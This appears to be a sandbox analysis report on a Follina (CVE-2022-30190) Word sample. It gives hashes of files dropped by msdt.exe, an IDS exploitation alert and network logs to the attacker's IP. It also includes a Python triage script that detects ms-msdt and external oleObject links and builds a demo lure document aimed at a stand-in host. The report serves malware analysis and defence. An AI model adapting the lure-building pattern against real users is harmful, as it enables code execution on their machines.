                                                                                                                                                                      SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                      MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                      SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                      SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                      SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66560
                                                                                                                                                                      Entropy (8bit):6.926109943059805
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                      MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                      SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                      SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                      SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):50242
                                                                                                                                                                      Entropy (8bit):4.932919499511673
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                      MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                      SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                      SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                      SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16946
                                                                                                                                                                      Entropy (8bit):4.860026903688885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                      MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                      SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                      SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                      SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):453
                                                                                                                                                                      Entropy (8bit):4.983419443697541
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                      MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                      SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                      SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                      SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6650
                                                                                                                                                                      Entropy (8bit):3.6751460885012333
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                      MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                      SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                      SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                      SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                      Entropy (8bit):3.517898352371806
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                      MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                      SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                      SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                      SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):48956
                                                                                                                                                                      Entropy (8bit):5.103589775370961
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                      MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                      SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                      SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                      SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                                      File type:Microsoft OOXML
                                                                                                                                                                      Entropy (8bit):7.869060797789825
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                      • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                      File name:doc782.docx
                                                                                                                                                                      File size:10144
                                                                                                                                                                      MD5:e7015438268464cedad98b1544d643ad
                                                                                                                                                                      SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
                                                                                                                                                                      SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
                                                                                                                                                                      SHA512:d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad
                                                                                                                                                                      SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2
                                                                                                                                                                      TLSH:A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C
                                                                                                                                                                      File Content Preview:PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p
                                                                                                                                                                      Icon Hash:74fcd0d2d6d6d0cc
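The sample block above identifies doc782.docx only by its container type (OOXML, a ZIP archive with [Content_Types].xml at the root) and its digests. The thing an analyst actually wants to know before detonating a Follina candidate is whether any Word part carries a relationship with TargetMode="External", because that is how a CVE-2022-30190 document reaches the remote HTML stage that hands a ms-msdt: URL to msdt.exe. The script below is an added example, not Joe Sandbox output and not the content of doc782.docx: it builds a constructed minimal docx in memory (the target URL http://example.invalid/stage.html! and the helper names build_sample_docx, triage and external_relationships are assumptions made for the demo), recomputes the same MD5/SHA1/SHA256 digests the report lists, confirms the OOXML container, and flags external oleObject or http(s)/ms-msdt relationship targets.

```python
import hashlib
import io
import json
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def hash_bytes(data: bytes) -> dict:
    """Digests in the same set the sandbox report lists (MD5, SHA1, SHA256)."""
    return {
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
    }


def is_ooxml(data: bytes) -> bool:
    """OOXML is a ZIP container that must carry [Content_Types].xml at its root."""
    if not data.startswith(b"PK\x03\x04"):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return "[Content_Types].xml" in z.namelist()
    except zipfile.BadZipFile:
        return False


def external_relationships(data: bytes) -> list:
    """Every relationship with TargetMode="External" across all *.rels parts.
    Word resolves such targets when the document is opened; a Follina document
    uses an external oleObject relationship to pull the attacker's HTML stage."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": rel.get("Target"),
                    })
    return found


def triage(data: bytes) -> dict:
    """Static pre-detonation summary: container check, digests, external targets."""
    report = {"ooxml": is_ooxml(data), "hashes": hash_bytes(data),
              "external": [], "suspicious": False}
    if report["ooxml"]:
        report["external"] = external_relationships(data)
        # External oleObject targets are the Follina pattern; any remote http(s)
        # or ms-msdt: target in a Word part deserves a look regardless of type.
        report["suspicious"] = any(
            r["type"] == "oleObject"
            or re.match(r"^(https?|ms-msdt):", r["target"] or "", re.I) is not None
            for r in report["external"]
        )
    return report


def build_sample_docx(target):
    """Constructed minimal docx for this demo (NOT doc782.docx). With target=None
    the document has only internal relationships; otherwise document.xml.rels
    carries one external oleObject relationship pointing at target."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            '</Types>')
        z.writestr("_rels/.rels",
            f'<Relationships xmlns="{RELS_NS}">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
            '</Relationships>')
        z.writestr("word/document.xml",
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body><w:p/></w:body></w:document>')
        ole = (f'<Relationship Id="rId5" Type="{OLE_REL}" Target="{target}" TargetMode="External"/>'
               if target else "")
        z.writestr("word/_rels/document.xml.rels",
            f'<Relationships xmlns="{RELS_NS}">{ole}</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # Demo on the constructed document, not on the real sample.
    print(json.dumps(triage(build_sample_docx("http://example.invalid/stage.html!")), indent=2))
```

To run it against a real sample, read the file bytes and pass them to triage(); the digests it prints should match the MD5/SHA1/SHA256 in the report before you trust anything else about the file.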
Timestamp                 Protocol  SID      Message                                                                                   Source Port  Dest Port  Source IP        Dest IP
06/07/22-19:44:37.058628  TCP       2036726  ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)  80           49171      185.234.247.119  192.168.2.22
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jun 7, 2022 19:50:11.678486109 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:11.706741095 CEST  80           49744      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:11.707032919 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:11.720185995 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:11.748521090 CEST  80           49744      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:11.748681068 CEST  80           49744      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:11.868760109 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:11.900027037 CEST  80           49744      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:12.080867052 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:14.981090069 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.009474993 CEST  80           49744      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.062145948 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.081763029 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.090497017 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.090615988 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.090852022 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.118818998 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.119044065 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.119088888 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.119126081 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.119158983 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.119165897 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.119193077 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.119196892 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.119206905 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.119216919 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.119255066 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.351569891 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.383161068 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.383297920 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.592542887 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.620670080 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.620789051 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.701190948 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.729496002 CEST  80           49744      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.765372038 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.793732882 CEST  80           49744      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.807533026 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.836622953 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.836743116 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.843090057 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.871623039 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:15.871742010 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:15.893604040 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:16.061703920 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:16.090388060 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:16.090501070 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:18.555954933 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:50:18.584733009 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:50:18.584845066 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:20.797236919 CEST  80           49744      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:20.797388077 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:20.797696114 CEST  49744        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:20.825763941 CEST  80           49744      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:23.583709002 CEST  80           49763      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:23.583813906 CEST  49763        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:26.241899014 CEST  49865        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:26.270068884 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.270190001 CEST  49865        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:26.283952951 CEST  49865        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:26.314517975 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452574015 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452677011 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452698946 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452717066 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452734947 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452752113 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452755928 CEST  49865        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:26.452764988 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452784061 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452789068 CEST  49865        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:26.452800035 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.452855110 CEST  49865        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:26.480300903 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480334044 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480350971 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480364084 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480380058 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480396032 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480412006 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480417013 CEST  49865        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:26.480441093 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480446100 CEST  49865        80         192.168.2.5      185.234.247.119
Jun 7, 2022 19:51:26.480458021 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480494976 CEST  80           49865      185.234.247.119  192.168.2.5
Jun 7, 2022 19:51:26.480514050 CEST  80           49865      185.234.247.119  192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480530977 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480539083 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480545998 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480547905 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480560064 CEST4986580192.168.2.5185.234.247.119
